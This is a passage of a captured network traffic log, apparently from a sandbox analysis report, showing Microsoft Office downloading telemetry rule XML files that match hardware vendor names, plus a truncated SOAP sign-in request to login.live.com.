                                                                                                                    2024-11-30 10:35:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    46192.168.2.44979413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:07 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:07 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:07 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 486
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                    x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103507Z-174f7845968frfdmhC1EWRxxbw00000011ag000000005nva
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:07 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    47192.168.2.44979513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:07 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:08 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:07 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 407
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                    x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103507Z-174f7845968cpnpfhC1EWR3afc00000010z0000000003sh3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:08 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    48192.168.2.44979613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:07 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:08 UTC491INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:07 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 469
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                    x-ms-request-id: 1f885eed-401e-0029-2ba8-429b43000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103507Z-174f7845968jrjrxhC1EWRmmrs00000011f00000000042y7
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:08 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    49192.168.2.44979713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:07 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:08 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:08 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                    x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103508Z-174f7845968swgbqhC1EWRmnb400000011kg0000000007ec
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:08 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    50192.168.2.44979840.126.53.19443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:08 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/soap+xml
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                    Content-Length: 4775
                                                                                                                    Host: login.live.com
                                                                                                                    2024-11-30 10:35:08 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                    2024-11-30 10:35:09 UTC568INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                    Expires: Sat, 30 Nov 2024 10:34:08 GMT
                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    x-ms-route-info: C533_SN1
                                                                                                                    x-ms-request-id: 02a9afb4-b0cf-43a4-9175-9d503a0c1a06
                                                                                                                    PPServer: PPV: 30 H: SN1PEPF0002F912 V: 0
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:08 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1918
                                                                                                                    2024-11-30 10:35:09 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    51192.168.2.44979913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:09 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:09 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:09 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 477
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                    x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103509Z-174f78459685m244hC1EWRgp2c000000114g000000005uds
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:09 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    52192.168.2.44980013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:09 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:10 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:10 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 464
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                    x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103510Z-174f7845968qj8jrhC1EWRh41s000000117g0000000059qv
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:10 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    53192.168.2.44980113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:09 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:10 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:10 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 494
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                    x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103510Z-174f7845968glpgnhC1EWR7uec00000011g0000000003hw0
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:10 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    54192.168.2.44980213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:10 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:10 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:10 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                    x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103510Z-174f7845968psccphC1EWRuz9s00000011eg000000009yxd
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    55192.168.2.44980313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:10 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
